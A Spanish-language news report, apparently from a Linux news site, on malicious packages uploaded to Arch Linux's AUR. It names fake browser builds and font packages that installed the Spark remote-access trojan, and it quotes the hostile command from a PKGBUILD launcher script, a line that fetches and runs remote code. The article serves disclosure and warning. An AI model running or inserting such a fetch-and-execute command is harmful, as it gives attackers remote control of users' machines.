En el repositorio AUR (Arch User Repository), utilizado en Arch Linux para la distribuci\u00f3n de paquetes de desarrolladores externos, continu\u00f3 la publicaci\u00f3n de c\u00f3digo malicioso, integrado en paquetes de compilaciones no oficiales de navegadores. Adem\u00e1s de los paquetes maliciosos firefox-patch-bin, librewolf-fix-bin y zen-browser-patched-bin identificados hace dos semanas, se a\u00f1adi\u00f3 al AUR el paquete google-chrome-stable, que tambi\u00e9n contiene una modificaci\u00f3n que instala un componente malicioso, proporcionando acceso remoto al sistema. <\/p>\n

En el archivo PKGBUILD del paquete problem\u00e1tico se defini\u00f3 la instalaci\u00f3n de un script para ejecutar el navegador google-chrome-stable.sh, que entre otras cosas conten\u00eda el comando 'python -c \"$(curl https:\/\/segs.lol\/9wUb1Z)\"', que cargaba malware reconocido por el servicio VirusTotal como el troyano Spark, que permite controlar remotamente el sistema, iniciar procesos, transferir archivos, inspeccionar tr\u00e1fico y enviar capturas de pantalla. <\/p>\n

El paquete malicioso google-chrome-stable fue subido anteayer y fue eliminado por los administradores de AUR unas pocas horas despu\u00e9s de su aparici\u00f3n. Casi inmediatamente despu\u00e9s de la eliminaci\u00f3n de google-chrome-stable, se subieron a AUR dos paquetes maliciosos \u2014 'chrome' y 'chrome-bin', que conten\u00edan un script similar para instalar malware en el sistema del usuario. <\/p>\n

Posteriormente, se identificaron tres paquetes m\u00e1s con c\u00f3digo malicioso: ttf-mac-fonts-all, ttf-ms-fonts-all y gromit.
